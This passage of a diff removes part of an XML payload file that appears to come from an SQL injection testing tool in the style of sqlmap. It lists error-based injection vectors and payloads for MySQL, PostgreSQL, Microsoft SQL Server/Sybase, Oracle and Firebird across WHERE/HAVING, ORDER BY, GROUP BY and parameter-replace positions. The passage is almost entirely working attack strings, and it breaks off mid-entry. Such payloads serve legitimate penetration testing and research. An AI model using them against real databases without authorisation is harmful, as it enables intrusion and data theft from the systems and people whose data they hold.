-        <vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>
-        <stype>2</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-            <dbms_version>&gt;= 8.1.6</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird AND error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0 OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
-        <request>
-            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
-        <request>
-            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
-        <stype>2</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
-        <request>
-            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.5</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
-        <request>
-            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 4.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
-        <request>
-            <payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
-        <request>
-            <payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-            <dbms_version>&gt;= 8.1.6</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-        </details>
-    </test>
-    <!--
-         TODO: if possible, add payload for SQLite, Microsoft Access,
-         and SAP MaxDB - no known techniques at this time
-    -->
-    <!-- End of error-based tests - WHERE or HAVING clause -->
-
-    <!-- Error-based tests - After ORDER BY...LIMIT... -->
-    <test>
-        <title>MySQL &gt;= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)</vector>
-        <request>
-            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-    <!-- End of error-based tests - After ORDER BY...LIMIT... -->
-
-    <!-- Error-based tests - Parameter replace -->
-    <test>
-        <title>MySQL &gt;= 5.0 error-based - Parameter replace</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
-        <request>
-            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
-        <request>
-            <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
-        <request>
-            <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
-        <stype>2</stype>
-        <level>5</level>
-        <risk>0</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
-        <request>
-            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.5</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL error-based - Parameter replace</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
-        <request>
-            <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase error-based - Parameter replace</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
-        <request>
-            <payload>(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle error-based - Parameter replace</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
-        <request>
-            <payload>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird error-based - Parameter replace</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-        </details>
-    </test>
-    <!-- End of error-based tests - Parameter replace -->
-
-
-    <!-- Error-based tests - GROUP BY and ORDER BY clauses -->
-    <test>
-        <title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
-        <request>
-            <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
-        <request>
-            <payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)</title>
-        <stype>2</stype>
-        <level>5</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
-        <request>
-            <payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
